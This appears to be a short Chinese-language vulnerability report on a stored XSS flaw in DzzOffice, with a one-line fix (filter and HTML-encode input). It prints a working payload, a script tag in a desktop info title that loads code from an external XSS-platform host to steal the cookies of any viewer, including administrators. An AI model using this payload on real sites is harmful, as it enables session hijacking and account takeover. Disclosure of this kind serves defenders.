###0x01漏洞简介
dzzoffice存储型XSs一枚盲打后台 可打cookie
###0x02漏洞详情
点桌面的信息 新建
![](https://images.seebug.org/contribute/14a4e47c-a915-4aff-a07c-bf6430cc9dbf)
在信息标题处插入 代码 可触发 调用xss平台插入<script src=http://xxs.la/AgNpO2></script> 只要用户访问就可以打到他cookie了
![](https://images.seebug.org/contribute/de18a54d-3ce4-4488-98a8-c2ead97c8bc4)
![](https://images.seebug.org/contribute/093c8f5e-796b-4096-a247-a84590120328)
![](https://images.seebug.org/contribute/191a3987-b410-4886-80b7-ba008dfc4a7b)
###0x03修复方案
过滤,进行html处理。
暂无评论